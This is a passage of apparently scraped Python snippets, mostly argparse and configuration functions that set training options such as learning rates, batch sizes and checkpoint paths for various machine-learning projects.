dict_args['clip_ratio'] = 0.2\n dict_args['lam'] = 0.97\n dict_args['gamma'] = 0.99\n dict_args['save_freq'] = 10\n dict_args['ac_kwargs'] = dict(hidden_sizes=[dict_args['hid']]*dict_args['l'])\n return dict_args", "def add_generic_args(parser):\n parser.add_argument(\n \"--config_file\", type=str, help=\"path to config file for model\", required=True\n )\n parser.add_argument(\n \"--checkpoint_folder\",\n default=\"\",\n type=str,\n help=\"\"\"folder to use for saving checkpoints:\n epochal checkpoints are stored as model_<epoch>.torch,\n latest epoch checkpoint is at checkpoint.torch\"\"\",\n )\n parser.add_argument(\n \"--checkpoint_load_path\",\n default=\"\",\n type=str,\n help=\"\"\"path to load a checkpoint from, which can be a file or a directory:\n If the path is a directory, the checkpoint file is assumed to be\n checkpoint.torch\"\"\",\n )\n parser.add_argument(\n \"--pretrained_checkpoint_path\",\n default=\"\",\n type=str,\n help=\"\"\"path to load a pre-trained checkpoints from, which can be a file or a\n directory:\n If the path is a directory, the checkpoint file is assumed to be\n checkpoint.torch. This checkpoint is only used for fine-tuning\n tasks, and training will not resume from this checkpoint.\"\"\",\n )\n parser.add_argument(\n \"--checkpoint_period\",\n default=1,\n type=int,\n help=\"\"\"Checkpoint every x phases (default 1)\"\"\",\n )\n parser.add_argument(\n \"--show_progress\",\n default=False,\n action=\"store_true\",\n help=\"shows progress bar during training / testing\",\n )\n parser.add_argument(\n \"--skip_tensorboard\",\n default=False,\n action=\"store_true\",\n help=\"do not perform tensorboard visualization\",\n )\n parser.add_argument(\n \"--visdom_server\",\n default=\"\",\n type=str,\n help=\"visdom server to use (default None)\",\n )\n parser.add_argument(\n \"--visdom_port\",\n default=8097,\n type=int,\n help=\"port of visdom server (default = 8097)\",\n )\n parser.add_argument(\n \"--profiler\",\n default=False,\n action=\"store_true\",\n help=\"specify this argument to profile training code\",\n )\n parser.add_argument(\n \"--debug\",\n default=False,\n action=\"store_true\",\n help=\"specify this argument for debugging mode\",\n )\n parser.add_argument(\n \"--ignore_checkpoint_config\",\n default=False,\n action=\"store_true\",\n help=\"\"\"specify this argument to ignore\n the compatibility of the config (or lack of config) attached\n to the checkpoint; this will allow mismatches between\n the training specified in the config and the\n actual training of the model\"\"\",\n )\n parser.add_argument(\n \"--log_freq\",\n default=5,\n type=int,\n help=\"Logging frequency for LossLrMeterLoggingHook (default 5)\",\n )\n parser.add_argument(\n \"--image_backend\",\n default=\"PIL\",\n type=str,\n help=\"torchvision image decoder backend (PIL or accimage). Default PIL\",\n )\n parser.add_argument(\n \"--video_backend\",\n default=\"pyav\",\n type=str,\n help=\"torchvision video decoder backend (pyav or video_reader). Default pyav\",\n )\n parser.add_argument(\n \"--distributed_backend\",\n default=\"none\",\n type=str,\n help=\"\"\"Distributed backend: either 'none' (for non-distributed runs)\n or 'ddp' (for distributed runs). Default none.\"\"\",\n )\n\n return parser", "def training_opts(self):\n return self._training_opts", "def parse_args(mode=None):\n parser = ArgumentParser()\n if mode == \"train\":\n parser.add_train_arguments()\n elif mode == \"trainval\":\n parser.add_train_val_arguments()\n elif mode == \"val\":\n parser.add_val_arguments()\n elif mode == \"test\":\n parser.add_test_arguments()\n else:\n raise ValueError(\n \"build_argparser received incorrect mode.\"\n \" Possible modes: ('train', 'trainval', 'val', 'test').\"\n )\n return vars(parser.parse_args())", "def add_args(parser):\n rescore_add_args(parser)\n parser.add_argument(\n \"--rl-weight\",\n type=float,\n default=0.1,\n help=\"trade-off coefficient of rl loss\",\n )\n parser.add_argument(\n \"--rl-num-trajectory\",\n type=int,\n default=3,\n help=\"num trajectory in rl training\",\n )", "def Args(parser):\n # TODO(user): move all flags definition to api_lib/ml/flags.py.\n parser.add_argument('job', help='Name of the batch prediction job.')\n parser.add_argument('--model', required=True, help='Name of the model.')\n parser.add_argument(\n '--version',\n help='Model version to be used. If unspecified, the default version '\n 'of the model will be used.')\n # input location is a repeated field.\n parser.add_argument(\n '--input-paths',\n type=arg_parsers.ArgList(min_length=1),\n required=True,\n help='Google Cloud Storage paths to the instances to run prediction on.'\n ' Wildcards accepted. Multiple paths can be specified if more than one '\n 'file patterns are needed. Example: '\n 'gs://my-bucket-0/instances0,gs://my-bucket-1/instances1')\n parser.add_argument(\n '--data-format',\n required=True,\n choices=['TEXT', 'TF_RECORD'],\n help='Data format of the input files.')\n parser.add_argument(\n '--output-path', required=True,\n help='Google Cloud Storage path to which to save the output. '\n 'Example: gs://my-bucket/output.')\n parser.add_argument(\n '--region',\n required=True,\n help='The Google Compute Engine region to run the job in.')", "def define_parameters(self):\n\n self.add_argument('--input1',dest='input1',type=str,optional=False,\n help='What file do you want to upload?')\n self.add_argument('--input2',dest='input2',type=str,optional=False,\n help='What file do you want to upload?')", "def get_args():\r\n\r\n ap = argparse.ArgumentParser(add_help=False,\r\n description='Arguments for training Goturn Tracker')\r\n ap.add_argument('--npus', type=int, default=1,\r\n help='number of npus, 0: means no npu, -1 to use all \\\r\n npus, 1 = use one npu, 2 = use two npus')\r\n ap.add_argument('--device', type=int, default=0, help='which npu to train')\r\n # Data settings\r\n ap.add_argument('--imagenet_path', type=str,\r\n required=True, help='path to imagenet folder, this \\\r\n folder shoud have images and gt folder')\r\n ap.add_argument('--alov_path', type=str,\r\n required=True, help='path to ALOV folder, this \\\r\n folder should have images and gt folder')\r\n\r\n # architecture and hyperparameters\r\n ap.add_argument('--arch', default='alexnet',\r\n choices={'alexnet'}, help='model architecture, \\\r\n default: alexnet, currently only alexnet is \\\r\n supported')\r\n ap.add_argument('--pretrained_model',\r\n default='../goturn/models/pretrained/alexnet.pth.tar',\r\n help='Path to pretrained model')\r\n ap.add_argument('--epochs', default=90,\r\n type=int, help='number of total epochs to run')\r\n ap.add_argument('--batch_size', default=3,\r\n type=int, help='number of images per batch')\r\n ap.add_argument('--max_steps', default=None,\r\n type=int, help='number of total steps to run')\r\n\r\n # Optimizer settings\r\n ap.add_argument('--lr', default=1e-6, type=float,\r\n help='initial learning rate', dest='lr')\r\n ap.add_argument('--momentum', default=0.9, type=float, help='momentum')\r\n ap.add_argument('--wd', default=5e-4, type=float, help='weight decay (default: 5e-4)',\r\n dest='wd')\r\n ap.add_argument('--lr_step', default=1, type=int,\r\n help='Number of epoch after which we change the learning rate',\r\n dest='lr_step')\r\n ap.add_argument('--gamma', default=0.1, type=float,\r\n help='multiplicative factor for learning rate',\r\n dest='gamma')\r\n\r\n # reproducibility\r\n ap.add_argument('--seed', type=int, default=42, help='seed value')\r\n # ap.add_argument('--seed', type=int, default=800, help='seed value')\r\n\r\n # save path\r\n ap.add_argument('--save_path', default=\".\", type=str, help='path to save output')\r\n\r\n # goturn specific arguments\r\n ap = GoturnTrain.add_model_specific_args(ap)\r\n return ap.parse_args()", "def load_args():\n parser = argparse.ArgumentParser(description=\"Classify and predict digits using the mnist dataset\")\n parser.add_argument('mode', help='the mode to run in: fit, model or predict')\n parser.add_argument('--algo', help='which algorithm to use: RandomForest, KNN')\n return parser.parse_args()", "def configure_args(self):\n super(InstaApriori, self).configure_args()\n self.add_passthru_arg('-iteration', type=int, help=\"The current iteration. Not used as a command line argument\")\n self.add_passthru_arg('--k', type=int, default=3, help=\"Specify the maximum size of itemsets to find\")\n self.add_passthru_arg('--s', type=float, help=\"Specify the minimum support threshold\")\n self.add_passthru_arg('--c', type=float, default=0, help=\"Specify the minimum confidence threshold\")\n self.add_file_arg('--f', default='frequent.txt',\n help=\"Specify the name of the file used to store frequent itemsets\")", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def fixture_wrapper_arguments():\n n_features = 9\n classes = [\"a\", \"b\", \"c\"]\n\n return n_features, classes", "def parse_args():\n parser = common.default_args(net_name=NET_NAME, \n num_classes=21, image_size=IMAGE_SIZE)\n parser.add_argument('--trained-model', required=False, help='Path to trained state_dict file', \n default=TRAINED_MODEL_PATH)\n return parser.parse_args()", "def setup(args):\n cfg = get_cfg()\n cfg.merge_from_file(args.config_file)\n cfg.merge_from_list(args.opts)\n # customize reszied parameters\n # cfg['INPUT']['MIN_SIZE_TRAIN'] = (20,)\n # cfg['INPUT']['MAX_SIZE_TRAIN'] = 50\n cfg.freeze()\n default_setup(\n cfg, args\n ) # if you don't like any of the default setup, write your own setup code\n return cfg", "def get_train_args():\n parser = argparse.ArgumentParser('Train a Text Summarization Model')\n\n # parser.add_argument('--hiddenDim', nargs='?', type=int, default=50, help='The size of the hidden dimension to be used for all layers')\n parser.add_argument('--hiddenDim', type=int, default=50, help='The size of the hidden dimension to be used for all layers')\n parser.add_argument('--numLayers', type=int, default=2, help='The number of LSTM layers')\n parser.add_argument('--batchSize', type=int, default=16, help='The batch size')\n parser.add_argument('--numEpochs', type=int, default=10, help='The number of epochs to train for')\n parser.add_argument('--lr', type=float, default=1e-3, help='The learning rate')\n parser.add_argument('--dropout', type=float, default=0.0, help='Dropout rate')\n parser.add_argument('--seed', type=int, default=0, help='To seed the random state for repeatability')\n parser.add_argument('--printEveryIters', type=int, default=250, help='To print/log after this many iterations')\n parser.add_argument('--tbDescr', type=str, default='', help='Experiment description for tensorboard logging')\n parser.add_argument('--savedModelDir', default=None, help='Location for saving model checkpoints during training')\n parser.add_argument('--loadBestModel', type=str2bool, default=False, help='Load the Best Saved Model')\n parser.add_argument('--modelType', type=str, help='The Model Type to Use')\n parser.add_argument('--toTrain', type=str2bool, default=True, help='Flag to train or evaluate the model')\n parser.add_argument('--fullVocab', type=str2bool, default=True, help='Use the full vocab or generate vocab based only upon the data used for training')\n parser.add_argument('--trainSize', type=int, default=128, help='Size of training data')\n parser.add_argument('--valSize', type=int, default=16, help='Size of validation data')\n parser.add_argument('--tfThresh', type=float, default=0.0, help='Amount of time to not do teacher forcing during training')\n parser.add_argument('--beamSize', type=int, default=0, help='Beam size for beam search. 0 means no beam search')\n\n args = parser.parse_args()\n return args", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"Factorized Spatial Embeddings\")\n parser.add_argument(\"--mode\", default=MODE, choices=[\"train\", \"test\"])\n parser.add_argument(\"--batch_size\", type=int, default=BATCH_SIZE,\n help=\"Number of images sent to the network in one step.\")\n parser.add_argument(\"--input_dir\", type=str, default=DATA_DIRECTORY,\n help=\"Path to the directory containing the training or testing images.\")\n parser.add_argument(\"--K\", type=int, default=LANDMARK_N,\n help=\"Number of landmarks.\")\n parser.add_argument(\"--scale_size\", type=int, default=SCALE_SIZE,\n help=\"Scale images to this size before cropping to CROP_SIZE\")\n parser.add_argument(\"--crop_size\", type=int, default=CROP_SIZE,\n help=\"CROP images to this size\")\n parser.add_argument(\"--checkpoint\", default=CHECKPOINT,\n help=\"Directory with checkpoint to resume training from or use for testing\")\n parser.add_argument(\"--output_dir\", default=OUTPUT_DIR,\n help=\"Where to put output files\")\n parser.add_argument(\"--img_folder\",type=str, default='images',help=\"save the predicted landmarks\")\n \n return parser.parse_args()", "def __init__(self, args):\n self.batch_size = args.pop(\"batch_size\", 4096)\n self.iteration = args.pop(\"iteration\", 0)\n self.learning_rate = args.pop(\"learning_rate\", 0.003)\n self.learning_rate_decay = args.pop(\"learning_rate_decay\", 0.7)\n self.training_epochs = args.pop(\"training_epochs\", 10)\n self.training_history = args.pop(\"training_history\", [])\n self.tf_summary_writer = None\n with self.graph.as_default():\n self.tf_learning_rate = tf.placeholder(tf.float32)", "def _setup_misc(self, mode):\n self.lr_rate_ph = tf.Variable(0.0, name='lrn_rate', trainable=False)\n self.reuse = None if (mode == 'train') else True\n self.batch_size = self.hparams.batch_size\n if mode == 'eval':\n self.batch_size = 25", "def initialize():\n\n parser = build_arg_parser()\n par = parser.parse_known_args()[0]\n\n # Main arguments.\n set('run_mode', par.run_mode)\n set('input_files', par.image)\n\n # Sub-parser specific arguments.\n if par.run_mode == 'train':\n\n set('batch_size', par.batch_size)\n set('drop', par.drop)\n set('epochs', par.epochs)\n set('model', par.model)\n set('level', par.level)\n set('vfrac', par.vfrac)\n set('data_augm', par.data_augm)\n set('summary', par.summary)\n set('outdir', par.outdir)\n # Parameters associated with super-resolution. \n set('super_resolution', par.super_resolution)\n set('generator', par.generator)\n set('discriminator', par.discriminator)\n\n elif par.run_mode == 'predict':\n\n set('tile_edge', par.edge)\n set('model', par.model)\n set('save_conv2d_kernels', par.save_conv2d_kernels) \n set('save_conv2d_outputs', par.save_conv2d_outputs) \n set('colormap', par.colormap)\n # Parameters associated with super-resolution. \n set('super_resolution', par.super_resolution)\n set('generator', par.generator)\n\n elif par.run_mode == 'diagnose': \n \n set('model', par.model) \n \n else:\n \n pass", "def parse_args(args):\n parser = argparse.ArgumentParser(description='Training parameters')\n #\n # parser.add_argument('--type', type=str, default='DDQN',help=\"Algorithm to train from {A2C, A3C, DDQN, DDPG}\")\n # parser.add_argument('--is_atari', dest='is_atari', action='store_true', help=\"Atari Environment\")\n # parser.add_argument('--with_PER', dest='with_per', action='store_true', help=\"Use Prioritized Experience Replay (DDQN + PER)\")\n # parser.add_argument('--dueling', dest='dueling', action='store_true', help=\"Use a Dueling Architecture (DDQN)\")\n # #\n # parser.add_argument('--nb_episodes', type=int, default=5000, help=\"Number of training episodes\")\n # parser.add_argument('--batch_size', type=int, default=64, help=\"Batch size (experience replay)\")\n # parser.add_argument('--consecutive_frames', type=int, default=4, help=\"Number of consecutive frames (action repeat)\")\n # parser.add_argument('--training_interval', type=int, default=30, help=\"Network training frequency\")\n # parser.add_argument('--n_threads', type=int, default=8, help=\"Number of threads (A3C)\")\n # #\n # parser.add_argument('--gather_stats', dest='gather_stats', action='store_true',help=\"Compute Average reward per episode (slower)\")\n # parser.add_argument('--render', dest='render', action='store_true', help=\"Render environment while training\")\n # parser.add_argument('--env', type=str, default='BreakoutNoFrameskip-v4',help=\"OpenAI Gym Environment\")\n # parser.add_argument('--gpu', type=int, default=0, help='GPU ID')\n #\n # parser.set_defaults(render=False)\n parser.add_argument('--lr', type=float, default=0.0005)\n parser.add_argument('--ep', type=int, default=2000)\n parser.add_argument('--gpu', type=str, default=\"-1\", help='GPU ID')\n\n return parser.parse_args(args)", "def args_to_add(cls, index=None) -> [Argument]:\n return super().args_to_add(index) + [\n Argument('load', default=\"False\", type=str, help='load the cached weights or continue', is_bool=True),\n Argument('batches_forward', default=0, type=int, help='num batches to forward the network, to adapt bn'),\n Argument('batches_train', default=0, type=int, help='num batches to train the network, -1 for an epoch'),\n Argument('batches_eval', default=-1, type=int, help='num batches to train the network, -1 for an epoch'),\n Argument('value', default='val/accuracy/1', type=str, help='which top k value to optimize'),\n ]", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"resnet based fcn Network\")\n parser.add_argument(\"--epochs\", type=int, default=epochs)\n parser.add_argument(\"--image_size\", type=int, default=image_size)\n parser.add_argument(\"--learning_rate\", type=float, default=learning_rate)\n return parser.parse_args()", "def prepare_args():\n parser = argparse.ArgumentParser(description='Args for training')\n \"\"\"Optional arguments for pre-split train/test files\n parser.add_argument('--train_file', type=str, default='data/train.npy')\n parser.add_argument('--test_file', type=str, default='data/test.npy')\n parser.add_argument('--label_file',\n type=str,\n default='data/train_labels.npy')\n \"\"\"\n parser.add_argument('--dataset_file', type=str, default='data/dev.npy')\n parser.add_argument('--label_file',\n type=str,\n default='data/dev_labels.npy')\n parser.add_argument('--context', type=int, default=1)\n parser.add_argument('--batch_size', type=int, default=8)\n parser.add_argument('--optimizer', type=str, default='SGD')\n parser.add_argument('--model_name', type=str, default='SimpleNet')\n parser.add_argument('--lr', type=float, default=3e-4)\n parser.add_argument('--wd', type=float, default=0)\n parser.add_argument('--num_epochs', type=int, default=1000)\n parser.add_argument('--shuffle', action='store_true')\n args_to_ret = parser.parse_args()\n return args_to_ret", "def Params(cls):\n p = super().Params()\n p.Define('train_task', None, 'Underlying task')\n p.Define('decode_task', None, 'Underlying task')\n p.Define('train_dataset_name', None, '')\n p.Define('decode_dataset_name', None, '')\n p.Define('train_steps_per_loop', 0, '')\n p.Define('decode_steps_per_loop', 0, '')\n return p", "def set_defaults(args):\n # Check critical files exist\n args.train_file = os.path.join(args.data_dir, args.train_file)\n if not os.path.isfile(args.train_file):\n raise IOError('No such file: %s' % args.train_file)\n args.dev_file = os.path.join(args.data_dir, args.dev_file)\n if not os.path.isfile(args.dev_file):\n raise IOError('No such file: %s' % args.dev_file)\n if args.embedding_file:\n args.embedding_file = os.path.join(args.embed_dir, args.embedding_file)\n if not os.path.isfile(args.embedding_file):\n raise IOError('No such file: %s' % args.embedding_file)\n\n # Set model directory\n subprocess.call(['mkdir', '-p', args.model_dir])\n\n # Set model name\n if not args.model_name:\n import uuid\n import time\n args.model_name = time.strftime(\"%Y%m%d-\") + str(uuid.uuid4())[:8]\n\n # Set log + model file names\n args.log_file = os.path.join(args.model_dir, args.model_name + '.txt')\n args.model_file = os.path.join(args.model_dir, args.model_name + '.pt')\n\n # Embeddings options\n if args.embedding_file:\n with open(args.embedding_file) as f:\n dim = len(f.readline().strip().split(' ')) - 1\n args.embedding_dim = dim\n elif not args.embedding_dim:\n raise RuntimeError('Either embedding_file or embedding_dim '\n 'needs to be specified.')\n\n # Make sure fix_embeddings and embedding_file are consistent\n if args.fix_embeddings:\n if not (args.embedding_file or args.pretrained):\n logger.warning('WARN: fix_embeddings set to False '\n 'as embeddings are random.')\n args.fix_embeddings = False\n return args", "def predict_input_args():\n # Create Parse using ArgumentParser\n parser = argparse.ArgumentParser()\n parser.add_argument('image', type = str, help = 'Path to the folder and file name of image to be checked') \n parser.add_argument('checkpoint', type = str, help = 'Checkpoint folder name') \n parser.add_argument('--gpu', type = bool, default = False, help = 'True = GPU enabled, False = GPU disabled') \n parser.add_argument('--topk', type = int, default = 5, help = 'Top number of class predicitions') \n parser.add_argument('--json', type = str, default = 'cat_to_name.json', help = 'Path to the folder and file name of JSON map used') \n return parser.parse_args()", "def add_args(parser):\n NATransformerModel.add_args(parser)\n parser.add_argument('--share-encoder-embeddings', action='store_true',\n help='share encoder embeddings across languages')\n parser.add_argument('--share-decoder-embeddings', action='store_true',\n help='share decoder embeddings across languages')\n parser.add_argument('--share-encoders', action='store_true',\n help='share encoders across languages')\n parser.add_argument('--student-arch', default=\"nonautoregressive_transformer\",\n help='determine the type of student network to mutual learn from.') \n parser.add_argument('--teacher-arch', default=\"transformer\",\n help='determine the type of teacher network to mutual learn from.')\n\n parser.add_argument('--load-to-teacher', action='store_true',\n help='load checkpoint to teacher network.')\n parser.add_argument('--freeze-teacher', action='store_true',\n help='whether to freeze teacher.')\n\n parser.add_argument(\"--student-kd-factor\",\n default=.5,\n type=float,\n help=\"weights on the knowledge distillation loss for training student\"\n )\n parser.add_argument(\"--teacher-kd-factor\",\n default=.5,\n type=float,\n help=\"weights on the knowledge distillation loss for training teacher\"\n )\n parser.add_argument(\"--control-kd-factor\", action=\"store_true\",\n help=\"use the PI algorithm introduced in ControlVAE to calculate the weight on KL-divergence on latent.\")\n parser.add_argument('--control-kd-args', type=str, metavar='JSON',\n help=\"\"\"args for ControlVAE, a valid setup is: '{\"v_kl\": 3.0, \"Kp\": 0.01, \"Ki\": 0.0001, \"beta_min\": 0.0, \"beta_max\": 1.0 }' \"\"\")\n\n\n # inference flags\n parser.add_argument('--reduce-to-student', action='store_true',\n help='when inference, only load student network.')\n parser.add_argument('--reduce-to-teacher', action='store_true',\n help='when inference, only load teacher network.')", "def train_dagger(): # add arguments as needed\n pass", "def get_args():\n\n parser = argparse.ArgumentParser(description='PyTorch BERT Model')\n parser = add_model_config_args(parser)\n parser = add_fp16_config_args(parser)\n parser = add_training_args(parser)\n parser = add_evaluation_args(parser)\n parser = add_data_args(parser)\n\n args = parser.parse_args()\n\n args.cuda = torch.cuda.is_available()\n args.rank = int(os.getenv('RANK', '0'))\n args.world_size = int(os.getenv(\"WORLD_SIZE\", '1'))\n\n args.dynamic_loss_scale = False\n if args.loss_scale is None:\n args.dynamic_loss_scale = True\n print(' > using dynamic loss scaling')\n\n # The args fp32_* or fp16_* meant to be active when the\n # args fp16 is set. So the default behaviour should all\n # be false.\n if not args.fp16:\n args.fp32_embedding = False\n args.fp32_tokentypes = False\n args.fp32_layernorm = False\n\n print_args(args)\n return args", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"Factorized Spatial Embeddings\")\n parser.add_argument(\"--batch_size\", type=int, default=BATCH_SIZE,\n help=\"Number of images sent to the network in one step.\")\n parser.add_argument(\"--input_dir\", type=str, default=DATA_DIRECTORY,\n help=\"Path to the directory containing the training or testing images.\")\n parser.add_argument(\"--learning_rate\", type=float, default=LEARNING_RATE,\n help=\"Learning rate for adam.\")\n parser.add_argument(\"--beta1\", type=float, default=MOMENTUM,\n help=\"Momentum component of the optimiser.\")\n parser.add_argument(\"--K\", type=int, default=LANDMARK_N,\n help=\"Number of landmarks.\")\n parser.add_argument(\"--M\", type=int, default=DOWNSAMPLE_M,\n help=\"Downsampling value of the diversity loss.\")\n parser.add_argument(\"--weight_decay\", type=float, default=WEIGHT_DECAY,\n help=\"Regularisation parameter for L2-loss.\")\n parser.add_argument(\"--diversity_weight\", type=float, default=DIVERSITY,\n help=\"Weight on diversity loss.\")\n parser.add_argument(\"--align_weight\", type=float, default=ALIGN,\n help=\"Weight on align loss.\")\n parser.add_argument(\"--scale_size\", type=int, default=SCALE_SIZE,\n help=\"Scale images to this size before cropping to CROP_SIZE\")\n parser.add_argument(\"--crop_size\", type=int, default=CROP_SIZE,\n help=\"CROP images to this size\")\n parser.add_argument(\"--max_epochs\", type=int, default=MAX_EPOCH,\n help=\"Number of training epochs\")\n parser.add_argument(\"--checkpoint\", default=CHECKPOINT,\n help=\"Directory with checkpoint to resume training from or use for testing\")\n parser.add_argument(\"--output_dir\", default=OUTPUT_DIR,\n help=\"Where to put output files\")\n parser.add_argument(\"--save_freq\", type=int, default=SAVE_FREQ, help=\"Save model every save_freq steps\")\n return parser.parse_args()", "def get_inner_training_args(self, eval=False):\n inner_training_args = TrainArgs(\n min_steps=self.num_inner_steps if not eval else self.num_inner_steps_eval,\n max_steps=self.num_inner_steps if not eval else self.num_inner_steps_eval,\n log_every_n_steps=self.log_every_n_steps,\n weights_summary=None, # Do not show model summary\n progress_bar_refresh_rate=0 # Do not show training progress bar\n )\n if torch.cuda.is_available():\n inner_training_args.kwargs['gpus'] = 1\n return inner_training_args", "def __init__(self):\n self.num_examples_per_epoch = 99999\n self.optimizer = \"Adam\"\n # Learning rate for the initial phase of training.\n self.initial_learning_rate = 0.0001\n self.learning_rate_decay_factor = 0.5\n self.num_epochs_per_decay = 8.0\n\n # Learning rate when fine tuning the Inception v3 parameters.\n self.train_inception_learning_rate = 0.0001\n\n # If not None, clip gradients to this value.\n self.clip_gradients = 5.0\n\n # How many model checkpoints to keep.\n self.max_checkpoints_to_keep = 5000", "def _set_params(self, estimator_args, scaler_args, execution_args, metric_args=None, dim_reduction_args=None):\n \n # Set default values which will be used if execution arguments are not passed\n \n # Default parameters:\n self.model.overwrite = True\n self.model.debug = False\n self.model.test_size = 0.33\n self.model.cv = 0\n self.model.time_series_split = 0\n self.model.max_train_size = None\n self.model.random_state = 42\n self.model.compress = 3\n self.model.retain_data = False\n self.model.scale_hashed = True\n self.model.scale_vectors = True\n self.model.scaler = \"StandardScaler\"\n self.model.scaler_kwargs = {}\n self.model.estimator_kwargs = {}\n self.model.missing = \"zeros\"\n self.model.calc_feature_importances = False\n self.model.importances_n_repeats = 30\n self.model.lags= None\n self.model.lag_target = False\n self.model.scale_target = False\n self.model.scale_lag_target= True\n self.model.make_stationary = None\n self.model.stationarity_lags = [1]\n self.model.using_keras = False\n self.model.current_sample_as_input = True\n self.model.prediction_periods = 1\n \n # Default metric parameters:\n if metric_args is None:\n self.model.metric_args = {}\n \n # Set execution parameters\n \n # If the execution key word arguments were included in the request, get the parameters and values\n if len(execution_args) > 0:\n \n # Transform the string of arguments into a dictionary\n execution_args = utils.get_kwargs(execution_args)\n \n # Set the overwite parameter if any existing model with the specified name should be overwritten\n if 'overwrite' in execution_args:\n self.model.overwrite = 'true' == execution_args['overwrite'].lower()\n \n # Set the test_size parameter that will be used to split the samples into training and testing data sets\n # Default value is 0.33, i.e. we use 66% of the samples for training and 33% for testing\n if 'test_size' in execution_args:\n self.model.test_size = utils.atof(execution_args['test_size'])\n\n # Enable K-fold cross validation. For more information see: http://scikit-learn.org/stable/modules/cross_validation.html#multimetric-cross-validation\n # Default value is 0 in which case a simple holdout strategy based on the test_size parameter is used.\n # If cv > 0 then the model is validated used K = cv folds and the test_size parameter is ignored.\n if 'cv' in execution_args:\n self.model.cv = utils.atoi(execution_args['cv'])\n \n # Enable timeseries backtesting using TimeSeriesSplit. https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.TimeSeriesSplit.html\n # This will select the a validation strategy appropriate for time series and sequential data.\n # The feature definitions must include an 'identifier' field which can be used to sort the series into the correct order.\n # The integer supplied in this parameter will split the data into the given number of subsets for training and testing.\n if 'time_series_split' in execution_args:\n self.model.time_series_split = utils.atoi(execution_args['time_series_split'])\n\n # This parameter can be used together with time_series_split.\n # It specifies the maximum samples to be used for training in each split, which allows for rolling/ walk forward validation.\n if 'max_train_size' in execution_args:\n self.model.max_train_size = utils.atoi(execution_args['max_train_size'])\n\n # Add lag observations to the feature matrix. Only applicable for Keras models.\n # An identifier field must be included in the feature definitions to correctly sort the data for this capability.\n # For e.g. if lags=2, features from the previous two samples will be concatenated as input features for the current sample.\n # This is useful for framing timeseries and sequence prediction problems into 3D or 4D data required for deep learning.\n if 'lags' in execution_args:\n self.model.lags = utils.atoi(execution_args['lags'])\n\n # Include targets in the lag observations\n # If True an additional feature will be created for each sample using the previous value of y \n if 'lag_target' in execution_args:\n self.model.lag_target = 'true' == execution_args['lag_target'].lower()\n \n # Scale the target before fitting\n # The scaling will be inversed before predictions so they are returned in the original scale \n if 'scale_target' in execution_args:\n self.model.scale_target = 'true' == execution_args['scale_target'].lower()\n\n # Scale lag values of the targets before fitting\n # Even if scale_target is set to false, the lag values of targets being used as features can be scaled by setting this to true \n if 'scale_lag_target' in execution_args:\n self.model.scale_lag_target = 'true' == execution_args['scale_lag_target'].lower()\n\n # Make the target series more stationary. This only applies to sequence prediction problems.\n # Valid values are 'log' in which case we apply a logarithm to the target values,\n # or 'difference' in which case we transform the targets into variance from the previous value.\n # The transformation will be reversed before returning predictions.\n if 'make_stationary' in execution_args:\n self.model.make_stationary = execution_args['make_stationary'].lower()\n\n # Provide lags periods for differencing\n # By default the difference will be done with lag = 1. Alternate lags can be provided by passing a list of lags as a list.\n # e.g. 'stationarity_lags=1;12|list|int'\n if 'stationarity_lags' in execution_args:\n self.model.stationarity_lags = utils.get_kwargs_by_type({'stationarity_lags': execution_args['stationarity_lags']})['stationarity_lags']\n\n # Specify if the current sample should be used as input to the model\n # This is to allow for models that only use lag observations to make future predictions\n if 'current_sample_as_input' in execution_args:\n self.model.current_sample_as_input = 'true' == execution_args['current_sample_as_input'].lower()\n\n # Specify the number of predictions expected from the model\n # This can be used to get a model to predict the next m periods given inputs for the previous n periods.\n # This is only valid for Keras models which have a final output layer with more than one node\n if 'prediction_periods' in execution_args:\n self.model.prediction_periods = utils.atoi(execution_args['prediction_periods'])\n \n # Seed used by the random number generator when generating the training testing split\n if 'random_state' in execution_args:\n self.model.random_state = utils.atoi(execution_args['random_state'])\n \n # Compression level between 1-9 used by joblib when saving the model\n if 'compress' in execution_args:\n self.model.compress = utils.atoi(execution_args['compress'])\n \n # Flag to determine if the training and test data should be saved in the model\n if 'retain_data' in execution_args:\n self.model.retain_data = 'true' == execution_args['retain_data'].lower()\n\n # Flag to determine if feature importances should be calculated when the fit method is called\n if 'calculate_importances' in execution_args:\n self.model.calc_feature_importances = 'true' == execution_args['calculate_importances'].lower()\n\n # Sets the number of times a feature is randomly shuffled during the feature importance calculation\n if 'importances_n_repeats' in execution_args:\n self.model.importances_n_repeats = utils.atoi(execution_args['importances_n_repeats'])\n \n # Set the debug option for generating execution logs\n # Valid values are: true, false\n if 'debug' in execution_args:\n self.model.debug = 'true' == execution_args['debug'].lower()\n \n # Additional information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n # Increment log counter for the class. Each instance of the class generates a new log.\n self.__class__.log_no += 1\n\n # Create a log file for the instance\n # Logs will be stored in ..\\logs\\SKLearn Log <n>.txt\n self.logfile = os.path.join(os.getcwd(), 'logs', 'SKLearn Log {}.txt'.format(self.log_no))\n \n # Create dictionary of parameters to display for debug\n self.exec_params = {\"overwrite\":self.model.overwrite, \"test_size\":self.model.test_size, \"cv\":self.model.cv,\\\n \"time_series_split\": self.model.time_series_split, \"max_train_size\":self.model.max_train_size, \"lags\":self.model.lags,\\\n \"lag_target\":self.model.lag_target, \"scale_target\":self.model.scale_target, \"make_stationary\":self.model.make_stationary,\\\n \"random_state\":self.model.random_state, \"compress\":self.model.compress, \"retain_data\":self.model.retain_data,\\\n \"calculate_importances\": self.model.calc_feature_importances, \"importances_n_repeats\": self.model.importances_n_repeats,\\\n \"debug\":self.model.debug}\n\n self._print_log(1)\n \n # If the scaler key word arguments were included in the request, get the parameters and values\n if len(scaler_args) > 0:\n \n # Transform the string of arguments into a dictionary\n scaler_args = utils.get_kwargs(scaler_args)\n \n # Set scaler arguments that will be used when preprocessing the data\n # Valid values are: StandardScaler, MinMaxScaler, MaxAbsScaler, RobustScaler and QuantileTransformer\n # More information here: http://scikit-learn.org/stable/modules/preprocessing.html\n if 'scaler' in scaler_args:\n self.model.scaler = scaler_args.pop('scaler')\n \n if 'missing' in scaler_args:\n self.model.missing = scaler_args.pop('missing').lower()\n \n if 'scale_hashed' in scaler_args:\n self.model.scale_hashed 